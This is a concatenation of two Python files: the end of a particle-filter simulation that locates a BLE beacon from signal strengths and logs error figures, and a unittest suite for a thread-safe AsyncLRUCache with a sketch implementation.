currPerson.move_beacon_in_map(xdims,ydims,movingLimit,movingTendency,roomBoundary=roomWallWidth/2)
#currPerson.beacon_pos = predefinedPos[iterNo]
currPerson.calc_RSSIs_to_Receivers(minSignalValue,minUsefulSignal,maxSignalError )
currPerson.setBeaconDistances_fromRSSIs(minUsefulSignal)
global numberOfNotFounds
print iterNo
isProcessed=False
if all(dist is None for dist in currPerson.distToReceivers):
#print "all distances are None, no processing"
numberOfNotFounds+=1
pass
else:
currPerson.averaged_beacon_pos = currPerson.multiLateration(xdims,ydims,sensitivityOfResult)
#print "real pos is: " + str(currPerson.beacon_pos)
#print "multilateratiion pos is: " + str(currPerson.averaged_beacon_pos)
#print "averaged_beacon_pos for " + macID + " is: " + str(currPerson.averaged_beacon_pos)
#print "the real pos for " + macID + " is: " + str(currPerson.beacon_pos)
# 1st STEP
currPerson.predict_BLE(no_of_noise_elements = NumberOfParticles, movingLimit=movingLimit, pastCoeff = pastCoeff, xdims=xdims, ydims=ydims,movingTendency=movingTendency )
# 2nd STEP
currPerson.update_weights()
# resample if too few effective particles
if neff(currPerson.weights) < NumberOfParticles/2.0:
tmp_particles=np.zeros((NumberOfParticles, 2))
tmp_weights = np.zeros(NumberOfParticles)
tmp_particles[:]=currPerson.particles[:]
tmp_weights[:]=currPerson.weights[:]
currPerson.resample_from_higher_weights(tmp_particles, tmp_weights)
if np.allclose(tmp_weights, 1.0/NumberOfParticles):
currPerson.weights[:]=tmp_weights[:]
currPerson.particles[:]=tmp_particles[:]
else:
#print "no resampling is made for iteration " + iterNo
pass
currPerson.calc_PDF(strongSignalDistance,pastCoeff)
currPerson.prevCovMatrix=currPerson.covMatrix # store for blending in the next iteration (the attribute name must match the one read in calc_PDF)
currPerson.x_pp[:] = currPerson.x_prev[:] # or np.copyto(x_pp,x_prev)
currPerson.x_prev[:] = currPerson.particles[:] # or np.copyto(x_prev,particles)
global OverallError
CurrAccuracy = np.linalg.norm(currPerson.mu-currPerson.beacon_pos)
OverallError += CurrAccuracy
# https://stackoverflow.com/questions/20126061/creating-a-confidence-ellipses-in-a-sccatterplot-using-matplotlib
particles_x,particles_y=np.hsplit(currPerson.particles,2)
if iterNo == totalIterNo-1:
#print "OverallError error is: " + str(OverallError)
#print "average Error is: " + str(OverallError/(totalIterNo-numberOfNotFounds) )
#print "numberOfNotFounds is: " + str(numberOfNotFounds)
with open(sys.argv[2]+"_avgError.txt","a+") as outFile:
if OverallError!=0:
outFile.write(str(OverallError/(totalIterNo-numberOfNotFounds) ) + "\n")
else:
outFile.write(str(OverallError) + "\n")
with open(sys.argv[2]+"_noSignalError.txt","a+") as outFile:
outFile.write(str(numberOfNotFounds) + "\n" )
#if isProcessed:
# ax.legend([beaconPosPlot, muPlot, maxWeightedPlot], ['BLE Beacon Pos', 'Mean Of Particles', 'Most Weighted Particle'], loc="lower left", prop={'size': 10}, bbox_to_anchor=(0, 1))
#else:
# ax.legend([beaconPosPlot], ['BLE Beacon Pos'], loc="lower left", prop={'size': 10}, bbox_to_anchor=(0, 1))
####################################################################################################################################################################################
if __name__ == '__main__':
main()
|
test_async_lrucache.py
|
import unittest
import threading
import time
from .async_lrucache import AsyncLRUCache
class AsyncLRUCacheTest(unittest.TestCase):
def test_multiple_gets(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
cache.get(0)
cache.get(0)
cache.get(0)
value = cache.get(0)
self.assertEqual(count, 1)
self.assertEqual(value, 0)
def test_multiple_retrieves_different_keys(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in [1,2,3]:
t[x] = threading.Thread(target=th, args=(cache, x))
t[x].start()
time.sleep(0.15)
self.assertEqual(len(cache._lru._cache), 3)
self.assertEqual(count, 3)
def test_multiple_retrieves_same_keys(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 1000000))
t[x].start()
time.sleep(0.15)
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 1000000))
t[x].start()
self.assertEqual(len(cache._lru._cache), 1)
self.assertEqual(count, 1)
def test_inject(self):
count = 0
def dummycb(key):
nonlocal count
count +=1
time.sleep(0.1)
return key
cache = AsyncLRUCache(dummycb, 0.5, 3)
cache.inject(123, 123)
self.assertEqual(len(cache._lru._cache), 1)
def th(cache: AsyncLRUCache, key):
cache.get(key)
t = {}
for x in range(50):
t[x] = threading.Thread(target=th, args=(cache, 123))
t[x].start()
self.assertEqual(len(cache._lru._cache), 1)
self.assertEqual(count, 0)
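# For reference, a hedged minimal sketch of the cache contract these tests assume
# (constructor AsyncLRUCache(fetch_callback, ttl, maxsize), .get() deduplicating concurrent
# fetches of the same key, .inject() pre-populating, entries stored in an inner LRU at
# ._lru._cache). This is NOT the real implementation from .async_lrucache and it ignores
# ttl expiry; every name with a _Sketch prefix is an assumption made purely for illustration.
import collections

class _SketchLRU:
    def __init__(self, maxsize):
        self._cache = collections.OrderedDict()
        self._maxsize = maxsize

    def get(self, key):
        # Raises KeyError on a miss; moves the entry to the MRU end on a hit.
        value = self._cache[key]
        self._cache.move_to_end(key)
        return value

    def put(self, key, value):
        self._cache[key] = value
        self._cache.move_to_end(key)
        while len(self._cache) > self._maxsize:
            self._cache.popitem(last=False)  # evict the least recently used entry

class _SketchAsyncLRUCache:
    def __init__(self, callback, ttl, maxsize):
        self._callback = callback
        self._ttl = ttl  # kept for interface parity; expiry is not modelled in this sketch
        self._lru = _SketchLRU(maxsize)
        self._lock = threading.Lock()
        self._pending = {}  # key -> Event shared by concurrent getters of that key

    def inject(self, key, value):
        with self._lock:
            self._lru.put(key, value)

    def get(self, key):
        with self._lock:
            try:
                return self._lru.get(key)
            except KeyError:
                pass
            event = self._pending.get(key)
            if event is None:
                event = self._pending[key] = threading.Event()
                fetching = True
            else:
                fetching = False
        if fetching:
            value = self._callback(key)  # only one thread per key reaches this call
            with self._lock:
                self._lru.put(key, value)
                del self._pending[key]
            event.set()
            return value
        event.wait()
        with self._lock:
            return self._lru.get(key)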
|